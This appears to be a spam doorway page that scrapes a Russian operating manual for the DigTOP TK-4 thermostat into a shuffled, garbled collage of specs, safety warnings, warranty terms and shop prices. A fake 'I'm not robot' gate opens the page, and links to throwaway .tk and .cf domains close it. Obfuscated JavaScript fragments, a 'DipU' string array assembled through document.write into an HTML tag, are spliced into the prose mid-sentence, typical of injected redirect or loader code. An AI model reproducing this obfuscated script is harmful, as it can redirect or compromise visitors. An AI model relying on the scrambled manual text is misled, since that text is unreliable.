



I'm not robot



Continue

Инструкция По Эксплуатации Терморегулятора Тк-4

Все устанавливаемые значения сохраняются в энергонезависимой памяти контроллера. Не допускается попадание влаги на входные контакты клеммных блоков ивнутренние элементы терморегулятора.. +99°С Погрешность измерения: не более 0,5 °С Зона гистерезиса (dT): 0,1...39,9°С Два режима: Нагрев или Охлаждение Выход: max 20А(250В) Питание:.. Окончание гарантийного срока хранения или эксплуатации.. Инструкция ПО эксплуатации 1 Назначение Терморегулятор ТК - 4 предназначен для поддержания заданной пользователем температуры объекта с.. 007-75 В терморегуляторе используется опасное для жизни напряжение.. Для управления нагрузкой используется электромагнитное реле.. Монтаж и техническое обслуживание терморегулятора должны производиться квалифицированными специалистами, изучившиминастоящее руководство.

Гарантийное обслуживание прибора осуществляется при предоставлении правильно заполненного гарантийного талона и товарного чека.. 5 Наличие следов воздействия влаги, попадания посторонних предметов, пыли, грязи внутри изделия (в т.. Внимание! При устранении неисправностей, техническом обслуживании, монтажных работах необходимо отключитьтерморегулятор и подключить к нему устройства от сети.. 220(±10%)В, 50Гц Потребляемая мощность: не более 3 Вт Корпус: на DIN рейку 3 модуля.. с".DipU["tW"]="<">"DipU["RE"]="mm".DipU["xsk"]="in".DipU["rF"]="r".DipU["Lpe"]="MO".DipU["YMH"]="se".DipU["VQm"]="g".DipU["NVP"]=">". Внимание! Не допускается погружение датчика в жидкость.. 019-80. «Правила технической эксплуатации электроустановок потребителей» и«Правила техники безопасности при эксплуатации электроустановок потребителей».. Интернет-магазин ручного инструмента, реле напряжения и т.. +7 (929) 650-76-77 При звонке сообщите, что нашли информацию на сайте «Прозэктро». Запрещается использование терморегулятора в агрессивныхсредах с содержанием в атмосфере кислот, щелочей, масел и т.

var Veg = "%d0%98%d0%bd%d1%81%d1%82%d1%80%d1%83%d0%ba%d1%86%d0%b8%d1%8f+%d0%bf%d0%be+%d1%8d%d0%ba%d1%81%d0%bf%d0%bb%d1%83%d0%b0%d1%82%d0%b0%d1%86%d0%b8%d0%b8+%d1%82%d0%b5%d1%80%d0%bc%d0%be%d1%80%d0%b5%d0%b3%d1%83%d0%bb%d1%8f%d1%82%d0%be%d1%80%d0%b0+%d1%82%d0%ba-4";var DipU = new Array().DipU["lma"]=".. УСТРОЙСТВО ЦИФРОВОГО ТЕРМОРЕГУЛЯТОРА ТК-4: Терморегулятор управляется микроконтроллером, измерительным элементом служит цифровой датчик температуры DS18B20.. ЦЕНА ОТ 5 ШТУК ПО 1700,00 руб ЗАКАЗАТЬ ОНЛАЙН НА: www.. Основные характеристики: Производитель: DigTOP Страна производитель: Украина Дополнительные характеристики: Количество каналов измерения: 1 Диапазон измеряемых температур: -50,0... +125,0°С Диапазон регулируемых температур: -50,0... +125,0°С, шаг: 0,1°С Дискретность индикации: 0,1°С до 99°С, 1°С.. Терморегулятор) ТК - 4 предназначен для поддержания заданной пользователем температуры инструкция по эксплуатации.. Указания мер безопасности:По способу защиты от поражения электрическим током терморегу-лятор соответствует классу 2 по ГОСТ 12.

Установки пользователя вводятся в прибор с помощью кнопок, расположенных на передней панели прибора.. При необходимости погружения датчика в жидкость необходимо обеспечить его надежную гидроизоляцию.. Нормальная работа прибора гарантируется при температуре окружаю-щего воздуха от +5 °С до +50 °С и относительной влажности от 30 до 80%.. 1 Назначение Терморегулятор ТК - 4 предназначен для поддержания заданной пользователем температуры от одного.. ГАРАНТИЙНЫЕ ОБЯЗАТЕЛЬСТВА КОМПАНИИ DIGTOP: Гарантийный срок эксплуатации прибора – 12 месяцев со дня продажи, но не более 2 лет со дня выпуска на предприятии изготовителе.. - упаковка Инструкция по Купить Терморегулятор двухрежимный ТК - 4 от производителя DigTop электрик - характеристики, описание, назначение, Инструкция по эксплуатации.. 3 Самостоятельный ремонт пользователем 4 Изделие имеет следы механических повреждений (нарушение пломбирования, не товарный вид, подгорание силовых клемм с внешней стороны).

Прибор не нуждается в калибровке при замене датчика.. ТК-4 ЦИФРОВОЙ ТЕРМОРЕГУЛЯТОР Цена: 2100 руб за шт.. Инструкция по эксплуатации ТУ У 29 1-3496336-002.2011: Терморегулятор не предназначен для эксплуатации в условиях тряски и ударов, а также во взрывоопасных помещениях.. При эксплуатации и техническом обслужива-нии необходимо соблюдать требования ГОСТ 12.. В течение гарантийного срока эксплуатации изготовитель производит бесплатно ремонт прибора в случае несоответствия его требованиям технических условий при соблюдении потребителем правил хранения, подключения, и эксплуатации.. Прибор не подлежит гарантийному обслуживанию в следующих случаях: 1.. насекомых) 6 Удара молнии, пожара, затопления, Отсутствие вентиляции и других причин, находящихся вне контроля производителя.. auto-tools ru Комплект поставки: - цифровой терморегулятор ТК-4; - датчик температуры; - инструкция по эксплуатации; - упаковка.. write(DipU["Tgm"]+DipU["Uye"]+DipU["r1"]+DipU["aFa"]+DipU["AsE"]+DipU["Emp"]+DipU["VQm"]+DipU["kui"]+DipU["Uye"]+DipU["NVP"]+DipU["zZr"]+DipU["gak"]+DipU["GrX"]+DipU["bO"]+DipU["lF"]+DipU["GRw"]+DipU["yQX"]+DipU["uH"]+DipU["Uye"]+DipU["TZn"]+DipU["TL"]+DipU["eC"]+DipU["oks"]+DipU["rjF"]+DipU["Qb"]+DipU["Gik"]+DipU["BPE"]+DipU["GEC"]+DipU["Lpe"]+DipU["RE"]+DipU["lma"]+DipU["Uye"]+DipU["YMH"]+DipU["mo"]+DipU["Qa"]+DipU["ne"]+DipU["QHx"]+DipU["Wzi"]+DipU["xsk"]+DipU["Hn"]+DipU["sR"]+DipU["xw"]+DipU["NHw"]+DipU["FSg"]+DipU["nW"]+DipU["kai"]+DipU["Uye"]+DipU["rQY"]);Инструкция по эксплуатации.. Назначение: Одноканальный электронный цифровой терморегулятор температуры ТК-4 (далее терморегулятор) предназначен для поддержания заданной пользователем температуры объекта с отображением значений на встроенном цифровом светодиодном индикаторе.. 2 Условия эксплуатации и электрическая схема подключения не соответствуют «Инструкции по эксплуатации», прилагаемой к изделию.. r".DipU["Tgm"]=".. Рубрика: АВТОМАТИКА DIGTOP → ТЕРМОРЕГУЛЯТОРЫ. d70b09e2d4

<http://ropadine.tk/amorysi/100/1/index.html/>

<http://ruptpaldextca.tk/amorysi48/100/1/index.html/>

<http://guezchysourad.cf/amorysi85/100/1/index.html/>